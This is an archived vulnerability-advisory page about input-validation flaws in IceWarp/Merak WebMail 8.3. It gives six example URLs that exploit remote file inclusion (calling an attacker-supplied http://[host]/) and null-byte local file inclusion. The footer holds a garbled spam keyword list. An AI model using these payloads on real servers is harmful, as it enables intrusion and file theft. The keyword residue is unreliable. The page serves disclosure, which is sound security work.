about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , IceWarp Universal WebMail Multiple Input Validation Vulnerabilities


Title IceWarp Universal WebMail Multiple Input Validation Vulnerabilities
Published 2005-12-27-12:00AM
Updated 2005-12-27-05:23PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovered by Tan Chew Keong.
Vulnerable  Merak Mail Server 8.3 .0.r
Deerfield VisNetic Mail Server 8.3 .0 build 1
Not Vulnerable  
Code   An exploit is not required.

The following examples were provided:

http://example.com:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/

http://example.com:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/

http://example.com:32000/dir/include.html?lang=[file]%00

http://example.com:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST

http://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;

http://example.com:32000/mail/index.html?/mail/index.html?default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 29 Nov 2009 21:06:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Karthik Beli loksatta Dolphin Sm exploit fo ashiwaryas Bapilona www. iranx ra .../inc news for c ...erSucc www.jshuwe WW.Pink wo lo670l www. iranx 300u vivvo/inde flashbb linux 2.6 www.shjysp health.97z Thems r...ill/sa anastasia Tamilsex.C ro.89.sex Crack Data xss CMS is Fre Apache 2.2 vedeo sexs vuln/explo Free india www.sex.18 qilly.blog php-nuke 2 t523t 5FP012AOKQ TALBarCd.o vedio acti blackmale http://anc Bluefilim www.7cow.c princess h Bollaywods Tagger LE. WWW.VIDIOS w w sex co administra